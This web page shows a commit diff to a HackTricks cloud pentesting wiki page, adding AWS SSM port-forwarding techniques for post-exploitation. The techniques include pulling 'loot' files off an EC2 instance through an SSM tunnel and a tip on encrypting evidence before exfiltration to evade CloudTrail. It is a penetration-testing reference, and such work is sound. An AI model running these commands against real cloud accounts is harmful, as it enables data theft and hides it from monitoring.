gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-12 07:40:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #195 from HackTricks-wiki/update_How_to_transfer_files_in_AWS_using_SSM_20250806_013457

Browse Source 
How to transfer files in AWS using SSM
This commit is contained in:
SirBroccoli
2025-08-18 16:48:47 +02:00
committed by GitHub
parent f705477774 f0df70528a
commit 3b456ebc2e
1 changed files with 52 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

52
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
View File

@@ -138,6 +138,54 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls-
Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.
---
#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession)
If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required):
```bash
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8000","localPortNumber"="8000" \
--region <REGION>
```
The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**.
Common use cases:
* **File exfiltration**
1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate:
```bash
python3 -m http.server 8000
```
2. From your workstation fetch the files through the SSM tunnel:
```bash
curl http://localhost:8000/loot.txt -o loot.txt
```
* **Accessing internal web applications (e.g. Nessus)**
```bash
# Forward remote Nessus port 8834 to local 8835
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8834","localPortNumber"="8835"
# Browse to http://localhost:8835
```
Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content:
```bash
# On the instance
7z a evidence.7z /path/to/files/* -p'Str0ngPass!'
```
### Share AMI
```bash
@@ -474,6 +522,10 @@ if __name__ == "__main__":
main()
```
## References
- [Pentest Partners How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/)
{{#include ../../../../banners/hacktricks-training.md}}